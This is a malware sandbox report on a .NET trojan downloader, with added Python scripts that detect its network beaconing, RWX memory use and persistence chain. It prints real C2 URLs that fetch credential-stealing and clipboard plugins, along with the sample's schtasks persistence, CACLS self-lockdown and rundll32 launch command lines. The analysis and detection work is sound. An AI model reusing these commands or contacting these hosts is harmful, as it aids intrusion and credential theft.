Summary | ZeroBOX

power.exe

Tags: Ave Maria WARZONE RAT, Emotet, Gen1, Generic Malware, UPX, Malicious Library, Malicious Packer, Admin Tool (Sysinternals etc ...), PE64, PE File, OS Processor Check, JPEG Format, PE32, .NET EXE, DLL
Category FILE
Machine s1_win7_x6401
Started March 22, 2023, 5:26 p.m.
Completed March 22, 2023, 5:30 p.m.
Size 1.1MB
Type PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5 ba218b60cb97c3532b8b9c796d954622
SHA256 8bee3d713fc207a8ca82e8eaf85396b55fcd29fe9214a83ce9399fa48ac4bd4b
CRC32 B5E47169
ssdeep 24576:+DqJfHKurNTbvYkwdBd9BO3Oz1ITm+2Hd:+DIHKurdbvYDz5+2Hd
Yara
  • Is_DotNET_EXE - (no description)
  • Win_Backdoor_AsyncRAT_Zero - Win Backdoor AsyncRAT
  • IsPE32 - (no description)
  • PE_Header_Zero - PE File Signature

DNS Name Response Post-Analysis Lookup
j.ffbbjjkk.com 172.67.158.22 (none recorded)

IP Address Status Action
104.21.8.227 Active Moloch
164.124.101.2 Active Moloch
77.73.134.27 Active Moloch

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: SUCCESS: The scheduled task "nbveek.exe" has successfully been created.
console_handle: 0x00000007
1 1 0

WriteConsoleA (one call per character; every call: console_handle 0x00000007, status 1, return 1, repeated 0)

The single-character buffers, in the order logged, reassemble to the following (spaces and punctuation were not captured by the hook):
Areyousure
Y
N
processedfile

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp\16de06bfb4\nbveek.exe
console_handle: 0x00000007
1 1 0

WriteConsoleA (one call per character, same handle and return values as above)
processedfile

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp\16de06bfb4\nbveek.exe
console_handle: 0x00000007
1 1 0

WriteConsoleA (one call per character, same handle and return values as above)
Areyousur (the captured console output ends here)

This is the console output of the CACLS commands listed under the process section: CACLS prints its "Are you sure (Y/N)?" confirmation, which the piped "echo Y" answers, then "processed file: <path>" for each ACL change applied to nbveek.exe.
file C:\Program Files\Mozilla Firefox\firefox.exe
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\firefox.exe
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
Time & API Arguments Status Return Repeated

__exception__

stacktrace:
jgzhang+0x23ee @ 0x4023ee

exception.instruction_r: 8b 00 8b 00 8b 40 10 8b 55 20 8b 12 c7 44 24 14
exception.symbol: New___wmi___IWbemServices_ExecMethod@32+0x2a3 New___wmi___IWbemServices_ExecMethodAsync@28-0xde
exception.instruction: mov eax, dword ptr [eax]
exception.module: monitor-x86.dll (the sandbox's own API-hook library; the faulting symbol above is its IWbemServices_ExecMethod hook, so this access violation was raised inside the monitor rather than in the sample's own code)
exception.exception_code: 0xc0000005
exception.offset: 66639
exception.address: 0x736e044f
registers.esp: 1634368
registers.edi: 5199156
registers.eax: 0
registers.ebp: 1634824
registers.edx: 1634060
registers.ebx: 0
registers.esi: 1634916
registers.ecx: 1747255296
1 0 0

__exception__

stacktrace:
Save+0x8d733 Main-0x1371d cred64+0x91303 @ 0x7fef4831303
Save+0x8f34b Main-0x11b05 cred64+0x92f1b @ 0x7fef4832f1b
Save+0x903d3 Main-0x10a7d cred64+0x93fa3 @ 0x7fef4833fa3
Save+0x9077f Main-0x106d1 cred64+0x9434f @ 0x7fef483434f
Save+0xa0838 Main-0x618 cred64+0xa4408 @ 0x7fef4844408
Main+0x65 cred64+0xa4a85 @ 0x7fef4844a85
rundll32+0x2f42 @ 0xff232f42
rundll32+0x3b7a @ 0xff233b7a
BaseThreadInitThunk+0xd CreateThread-0x53 kernel32+0x1652d @ 0x76c2652d
RtlUserThreadStart+0x21 strchr-0x3df ntdll+0x2c521 @ 0x76d5c521

exception.instruction_r: 42 38 3c 00 75 f7 48 8b d0 48 8d 4c 24 50 e8 7a
exception.instruction: cmp byte ptr [rax + r8], dil
exception.exception_code: 0xc0000005
exception.symbol: Save+0x8d733 Main-0x1371d cred64+0x91303
exception.address: 0x7fef4831303
registers.r14: 0
registers.r15: 0
registers.rcx: 1099511627775
registers.rsi: 0
registers.r10: 152
registers.rbx: 0
registers.rsp: 1637424
registers.r11: 1632320
registers.r8: 0
registers.r9: 253416046601
registers.rdx: 3650336
registers.r12: 0
registers.rbp: 0
registers.rdi: 0
registers.rax: 1
registers.r13: 0
1 0 0
suspicious_features POST method with no referer header, POST method with no useragent header, Connection to IP address suspicious_request POST http://77.73.134.27/8bmdh3Slb2/index.php
suspicious_features POST method with no referer header, POST method with no useragent header, Connection to IP address suspicious_request POST http://77.73.134.27/8bmdh3Slb2/index.php?scr=1
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://77.73.134.27/8bmdh3Slb2/Plugins/cred64.dll
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://77.73.134.27/8bmdh3Slb2/Plugins/clip64.dll
request POST http://77.73.134.27/8bmdh3Slb2/index.php
request POST http://77.73.134.27/8bmdh3Slb2/index.php?scr=1
request GET http://77.73.134.27/8bmdh3Slb2/Plugins/cred64.dll
request GET http://77.73.134.27/8bmdh3Slb2/Plugins/clip64.dll
request GET https://j.ffbbjjkk.com/2701.html
request GET https://j.ffbbjjkk.com/logo.png
request POST http://77.73.134.27/8bmdh3Slb2/index.php
request POST http://77.73.134.27/8bmdh3Slb2/index.php?scr=1
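Added example, not part of the ZeroBOX report: the request list above is flagged by the sandbox for POSTs with no User-Agent or Referer to a bare IP and for DLLs fetched from a /Plugins/ path. The script below applies the same checks to proxy-log style records so the pattern can be hunted outside the sandbox. The URLs are taken from this page; the header sets on each record (and the two browser-like records for j.ffbbjjkk.com) are constructed assumptions, not captured traffic.

```python
"""Flag C2-like HTTP traffic: header-less POST beacons to raw IPs and plugin DLL fetches.

Added example. SAMPLE_LOG is constructed from the URLs in the sandbox report;
the header dictionaries are assumed, not captured.
"""
import ipaddress
import re
from urllib.parse import urlsplit

# Constructed records: (method, url, request headers). Header sets are assumptions.
SAMPLE_LOG = [
    ("POST", "http://77.73.134.27/8bmdh3Slb2/index.php", {}),
    ("POST", "http://77.73.134.27/8bmdh3Slb2/index.php?scr=1", {}),
    ("GET", "http://77.73.134.27/8bmdh3Slb2/Plugins/cred64.dll", {}),
    ("GET", "http://77.73.134.27/8bmdh3Slb2/Plugins/clip64.dll", {}),
    ("GET", "https://j.ffbbjjkk.com/2701.html",
     {"User-Agent": "Mozilla/5.0", "Referer": "https://j.ffbbjjkk.com/"}),
    ("GET", "https://j.ffbbjjkk.com/logo.png",
     {"User-Agent": "Mozilla/5.0", "Referer": "https://j.ffbbjjkk.com/2701.html"}),
]

PLUGIN_DLL = re.compile(r"/Plugins/[^/]+\.dll$", re.I)


def _is_bare_ip(host: str) -> bool:
    """True when the URL host is a literal IPv4/IPv6 address rather than a name."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def classify(method: str, url: str, headers: dict) -> list:
    """Return the suspicious features of one request, mirroring the sandbox wording."""
    parts = urlsplit(url)
    hdrs = {k.lower() for k in headers}
    features = []
    if "user-agent" not in hdrs:
        features.append(f"{method} method with no useragent header")
    if method == "POST" and "referer" not in hdrs:
        features.append("POST method with no referer header")
    if _is_bare_ip(parts.hostname or ""):
        features.append("Connection to IP address")
    if method == "GET" and PLUGIN_DLL.search(parts.path):
        features.append("DLL fetched from a /Plugins/ path")
    return features


def flag_requests(log: list) -> list:
    """Return (method, url, features) for every record with at least one feature."""
    flagged = []
    for method, url, headers in log:
        features = classify(method, url, headers)
        if features:
            flagged.append((method, url, features))
    return flagged


def beacon_hosts(log: list, min_posts: int = 2) -> list:
    """Hosts receiving repeated header-less POSTs: candidate C2 check-in endpoints."""
    counts = {}
    for method, url, headers in log:
        if method == "POST" and "user-agent" not in {k.lower() for k in headers}:
            host = urlsplit(url).hostname
            counts[host] = counts.get(host, 0) + 1
    return sorted(host for host, n in counts.items() if n >= min_posts)


if __name__ == "__main__":
    for method, url, features in flag_requests(SAMPLE_LOG):
        print(method, url, "->", "; ".join(features))
    print("beacon hosts:", beacon_hosts(SAMPLE_LOG))
```

The absence of a User-Agent is the strongest single signal here: the sample's own HTTP client sends none, while the two j.ffbbjjkk.com fetches (made through a browser-like client in this constructed log) carry normal headers and are not flagged.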
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2648
region_size: 1900544
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x006a0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00830000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2648
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x727a1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2648
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x727a2000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2648
region_size: 262144
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00580000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00580000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00522000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00555000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0055b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00557000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0053c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00b40000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0052a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2776
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73662000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2916
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73492000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2996
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73662000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2484
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000000007304c000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2632
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7347f000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2632
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x741b0000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2632
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73491000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2632
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72cb1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2632
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72c74000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2632
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73492000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2632
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73921000
process_handle: 0xffffffff
1 0 0
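Added example, not part of the ZeroBOX report: the memory records above are all PAGE_EXECUTE_READWRITE allocations or protection changes, which is the usual footprint of a packer or .NET loader unpacking code in place. The parser below reads records in exactly the layout printed above and summarises RWX activity per process. SAMPLE_TRACE copies three records from this page and adds one constructed PAGE_READWRITE record as a negative case.

```python
"""Parse sandbox API records (name line, key: value lines, 'status return repeated' line)
and summarise RWX memory activity per process.

Added example. SAMPLE_TRACE contains three records copied from the report plus one
constructed PAGE_READWRITE record (base 0x00c00000) that must not be flagged.
"""
import re
from collections import defaultdict

SAMPLE_TRACE = """\
NtAllocateVirtualMemory

process_identifier: 2648
region_size: 1900544
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x006a0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00830000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2632
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7347f000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2648
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 4 (PAGE_READWRITE)
base_address: 0x00c00000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
"""

API_NAME = re.compile(r"[A-Za-z_]\w*")
# GetCurrentProcess() pseudo-handle on 32- and 64-bit: anything else is a remote process.
SELF_HANDLES = {"0xffffffff", "0xffffffffffffffff"}


def parse_trace(text: str) -> list:
    """Split the trace into records: {'api', 'args', 'status', 'return', 'repeated'}."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if API_NAME.fullmatch(line):          # a bare identifier starts a new record
            cur = {"api": line, "args": {}}
            records.append(cur)
        elif cur is None:
            continue                          # skip headers before the first record
        elif ": " in line or line.endswith(":"):
            key, _, value = line.partition(":")
            cur["args"][key.strip()] = value.strip()
        else:
            nums = line.split()               # trailing "status return repeated" line
            if len(nums) == 3 and all(n.lstrip("-").isdigit() for n in nums):
                cur["status"], cur["return"], cur["repeated"] = map(int, nums)
    return records


def rwx_summary(records: list) -> dict:
    """Per-PID counts of RWX reserve/commit/protect calls, DEP-bypass flags and remote targets."""
    summary = defaultdict(lambda: {"rwx_commit": 0, "rwx_reserve": 0, "rwx_protect": 0,
                                   "heap_dep_bypass": 0, "remote": 0})
    for rec in records:
        args = rec["args"]
        if "PAGE_EXECUTE_READWRITE" not in args.get("protection", ""):
            continue
        s = summary[int(args.get("process_identifier", -1))]
        alloc = args.get("allocation_type", "")
        if rec["api"] == "NtAllocateVirtualMemory":
            s["rwx_commit"] += "MEM_COMMIT" in alloc
            s["rwx_reserve"] += "MEM_RESERVE" in alloc
        elif rec["api"] == "NtProtectVirtualMemory":
            s["rwx_protect"] += 1
        s["heap_dep_bypass"] += args.get("heap_dep_bypass") == "1"
        s["remote"] += args.get("process_handle", "") not in SELF_HANDLES
    return dict(summary)


if __name__ == "__main__":
    for pid, counts in sorted(rwx_summary(parse_trace(SAMPLE_TRACE)).items()):
        print(pid, counts)
```

Every process_handle on this page is the current-process pseudo-handle (0xffffffff, or 0xffffffffffffffff for the 64-bit PID 2484), so the RWX activity is in-process unpacking; a real handle value in that field would instead point at injection into another process.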
description nbveek.exe tried to sleep 141 seconds, actually delayed analysis time by 141 seconds
file C:\Users\test22\AppData\Roaming\07c6bc37dc5087\cred64.dll
file C:\Users\test22\AppData\Local\Temp\Player3.exe
file C:\Users\test22\AppData\Local\Temp\jgzhang.exe
file C:\Users\test22\AppData\Roaming\07c6bc37dc5087\clip64.dll
file C:\Users\test22\AppData\Local\Temp\ss31.exe
file C:\Users\test22\AppData\Local\Temp\db.dll
cmdline C:\Windows\system32\cmd.exe /S /D /c" echo Y"
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\test22\AppData\Local\Temp\16de06bfb4\nbveek.exe" /F
cmdline "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nbveek.exe" /P "test22:N"&&CACLS "nbveek.exe" /P "test22:R" /E&&echo Y|CACLS "..\16de06bfb4" /P "test22:N"&&CACLS "..\16de06bfb4" /P "test22:R" /E&&Exit
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\test22\AppData\Local\Temp\16de06bfb4\nbveek.exe" /F
file C:\Users\test22\AppData\Local\Temp\Player3.exe
file C:\Users\test22\AppData\Local\Temp\jgzhang.exe
file C:\Users\test22\AppData\Local\Temp\ss31.exe
file C:\Users\test22\AppData\Local\Temp\jgzhang.exe
file C:\Users\test22\AppData\Local\Temp\db.dll
file C:\Users\test22\AppData\Roaming\07c6bc37dc5087\clip64.dll
file C:\Users\test22\AppData\Local\Temp\Player3.exe
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\16de06bfb4\nbveek.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\16de06bfb4\nbveek.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: SCHTASKS
parameters: /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\test22\AppData\Local\Temp\16de06bfb4\nbveek.exe" /F
filepath: SCHTASKS
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: cmd
parameters: /k echo Y|CACLS "nbveek.exe" /P "test22:N"&&CACLS "nbveek.exe" /P "test22:R" /E&&echo Y|CACLS "..\16de06bfb4" /P "test22:N"&&CACLS "..\16de06bfb4" /P "test22:R" /E&&Exit
filepath: cmd
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: rundll32.exe
parameters: C:\Users\test22\AppData\Roaming\07c6bc37dc5087\cred64.dll, Main
filepath: rundll32.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: rundll32.exe
parameters: C:\Users\test22\AppData\Roaming\07c6bc37dc5087\clip64.dll, Main
filepath: rundll32.exe
1 1 0
Time & API Arguments Status Return Repeated

InternetReadFile

buffer: MZ ... "This program cannot be run in DOS mode." ... PE header with machine 0x8664 (x64), sections .text .rdata .data .pdata _RDATA .rsrc .reloc, followed by raw code bytes (binary image body omitted here)
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: MZ ... "This program cannot be run in DOS mode." ... PE header with machine 0x014c (x86), sections .text .rdata .data .rsrc .reloc, followed by raw code bytes (binary image body omitted here)
request_handle: 0x00cc000c
1 1 0
section .text: virtual_address 0x00002000, virtual_size 0x00121e94, size_of_data 0x00122000, entropy 7.05322403874 description A section with a high entropy has been found
entropy 0.998278829604 description Overall entropy of this PE file is high
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\test22\AppData\Local\Temp\16de06bfb4\nbveek.exe" /F
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\test22\AppData\Local\Temp\16de06bfb4\nbveek.exe" /F
host 77.73.134.27
file C:\ProgramData\AVAST Software
file C:\ProgramData\Avira
file C:\ProgramData\Kaspersky Lab
file C:\ProgramData\Panda Security
file C:\ProgramData\Bitdefender
file C:\ProgramData\AVG
file C:\ProgramData\Doctor Web
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\test22\AppData\Local\Temp\16de06bfb4\nbveek.exe" /F
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\test22\AppData\Local\Temp\16de06bfb4\nbveek.exe" /F
cmdline CACLS "..\16de06bfb4" /P "test22:N"
cmdline CACLS "nbveek.exe" /P "test22:N"
cmdline cmd /k echo Y|CACLS "nbveek.exe" /P "test22:N"&&CACLS "nbveek.exe" /P "test22:R" /E&&echo Y|CACLS "..\16de06bfb4" /P "test22:N"&&CACLS "..\16de06bfb4" /P "test22:R" /E&&Exit
cmdline "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nbveek.exe" /P "test22:N"&&CACLS "nbveek.exe" /P "test22:R" /E&&echo Y|CACLS "..\16de06bfb4" /P "test22:N"&&CACLS "..\16de06bfb4" /P "test22:R" /E&&Exit
cmdline CACLS "nbveek.exe" /P "test22:R" /E
cmdline CACLS "..\16de06bfb4" /P "test22:R" /E
Time & API Arguments Status Return Repeated

IWbemServices_ExecMethod

inargs.CurrentDirectory: None
inargs.CommandLine: rundll32.exe "C:\Users\test22\AppData\Local\Temp\db.dll",open
inargs.ProcessStartupInformation: None
flags: 0
method: Create
class: Win32_Process
1 0 0
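Added example, not part of the ZeroBOX report: the process records on this page (schtasks, cmd/CACLS and rundll32 via ShellExecuteExW, plus rundll32 via WMI Win32_Process.Create) form one persistence-and-lockdown chain: a task re-runs nbveek.exe from %LOCALAPPDATA%\Temp every minute, CACLS first denies the owning user all access to the file and its directory and then re-grants read-only, and plugin DLLs are invoked from user-writable paths by export name. The script below recognises each step from a process command line and ties the task to the lockdown of the same file. The command lines are copied from this page; the two rundll32 lines launched through ShellExecuteExW are reconstructed by joining the logged filepath and parameters, the PIDs are constructed placeholders, and the DAILY backup task is a constructed benign control.

```python
"""Detect minute-interval schtasks persistence, CACLS self-lockdown and rundll32
export loads from user-writable paths, and correlate task + lockdown on one file.

Added example. Command lines come from the sandbox report; PIDs are placeholders,
the two ShellExecuteExW rundll32 lines are reconstructed from filepath + parameters,
and the last record is a constructed benign control.
"""
import re

SAMPLE_PROCS = [
    (1, r'"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\test22\AppData\Local\Temp\16de06bfb4\nbveek.exe" /F'),
    (2, r'"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nbveek.exe" /P "test22:N"&&CACLS "nbveek.exe" /P "test22:R" /E&&echo Y|CACLS "..\16de06bfb4" /P "test22:N"&&CACLS "..\16de06bfb4" /P "test22:R" /E&&Exit'),
    (3, r'C:\Windows\system32\cmd.exe /S /D /c" echo Y"'),
    (4, r'rundll32.exe C:\Users\test22\AppData\Roaming\07c6bc37dc5087\cred64.dll, Main'),
    (5, r'rundll32.exe C:\Users\test22\AppData\Roaming\07c6bc37dc5087\clip64.dll, Main'),
    (6, r'rundll32.exe "C:\Users\test22\AppData\Local\Temp\db.dll",open'),
    (7, r'schtasks.exe /Create /SC DAILY /TN Backup /TR "C:\Program Files\Backup\backup.exe"'),  # constructed benign
]

SCHTASKS_MINUTE = re.compile(r'schtasks(?:\.exe)?"?\s+.*?/SC\s+MINUTE\b', re.I)
TR_ARG = re.compile(r'/TR\s+(?:"([^"]+)"|(\S+))', re.I)
CACLS_DENY = re.compile(r'CACLS\s+"([^"]+)"\s+/P\s+"([^":]+):N"', re.I)
CACLS_READ = re.compile(r'CACLS\s+"([^"]+)"\s+/P\s+"([^":]+):R"\s+/E', re.I)
RUNDLL = re.compile(r'rundll32(?:\.exe)?\s+"?([^",]+\.dll)"?\s*,\s*(\w+)', re.I)
USER_WRITABLE = re.compile(r'\\AppData\\(?:Local\\Temp|Roaming)\\', re.I)

TASK = "minute-interval task to user-writable path"
LOCK = "ACL lockdown: deny-then-read-only for own user"
LOAD = "rundll32 export from user-writable DLL"


def analyze(cmdline: str) -> list:
    """Return (finding, detail) pairs for one process command line."""
    findings = []
    if SCHTASKS_MINUTE.search(cmdline):
        tr = TR_ARG.search(cmdline)
        target = tr and (tr.group(1) or tr.group(2))
        if target and USER_WRITABLE.search(target):
            findings.append((TASK, target))
    # CACLS ":N" (no access) followed by ":R" /E (add read-only) on the same target is
    # a self-protection idiom: the user can still read and run it but not delete it.
    denies = {(t.lower(), u.lower()) for t, u in CACLS_DENY.findall(cmdline)}
    reads = {(t.lower(), u.lower()) for t, u in CACLS_READ.findall(cmdline)}
    for target, _user in sorted(denies & reads):
        findings.append((LOCK, target))
    m = RUNDLL.search(cmdline)
    if m and USER_WRITABLE.search(m.group(1)):
        findings.append((LOAD, f"{m.group(1)},{m.group(2)}"))
    return findings


def correlate(procs: list):
    """Run analyze() over (pid, cmdline) records; also return task targets that were locked down."""
    report, tasks, locked = [], {}, set()
    for pid, cmdline in procs:
        for kind, detail in analyze(cmdline):
            report.append((pid, kind, detail))
            basename = detail.rsplit("\\", 1)[-1].lower()
            if kind == TASK:
                tasks[basename] = detail
            elif kind == LOCK:
                locked.add(basename)
    chained = [path for name, path in tasks.items() if name in locked]
    return report, chained


if __name__ == "__main__":
    report, chained = correlate(SAMPLE_PROCS)
    for pid, kind, detail in report:
        print(pid, kind, detail)
    print("task+lockdown on same file:", chained)
```

The correlation step is what lifts this above a single-command signature: a per-minute task alone is noisy, and CACLS alone is rare but legitimate, while the two applied to the same file in the user's Temp directory is the behaviour seen in this run.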
Bkav W32.AIDetectNet.01
Lionic Trojan.Win32.ShortLoader.4!c
Elastic malicious (high confidence)
MicroWorld-eScan IL:Trojan.MSILZilla.9891
FireEye Generic.mg.ba218b60cb97c353
CAT-QuickHeal Backdoor.MsilFC.S22017452
ALYac IL:Trojan.MSILZilla.9891
Malwarebytes Trojan.Crypt.MSIL.Generic
Cynet Malicious (score: 100)
Alibaba TrojanDownloader:MSIL/Mokes.f71c2c66
CrowdStrike win/malicious_confidence_100% (W)
BitDefenderTheta Gen:NN.ZemsilF.36344.in0@a8Cibil
Cyren W32/MSIL_Kryptik.FFY.gen!Eldorado
Symantec Scr.Malcode!gdn33
ESET-NOD32 a variant of MSIL/Agent.UZA
APEX Malicious
Paloalto generic.ml
Kaspersky HEUR:Trojan-Downloader.MSIL.ShortLoader.gen
BitDefender IL:Trojan.MSILZilla.9891
Avast Win32:DropperX-gen [Drp]
Tencent Msil.Trojan-Downloader.Shortloader.Udkl
DrWeb Trojan.MulDropNET.43
VIPRE IL:Trojan.MSILZilla.9891
TrendMicro TROJ_GEN.R002C0DCL23
Trapmine malicious.moderate.ml.score
Sophos Troj/ILAgent-I
Ikarus Win32.Outbreak
Avira HEUR/AGEN.1357339
Gridinsoft Trojan.Win32.Gen.bot
Arcabit IL:Trojan.MSILZilla.D26A3
ViRobot Trojan.Win.Z.Agent.1190400.A
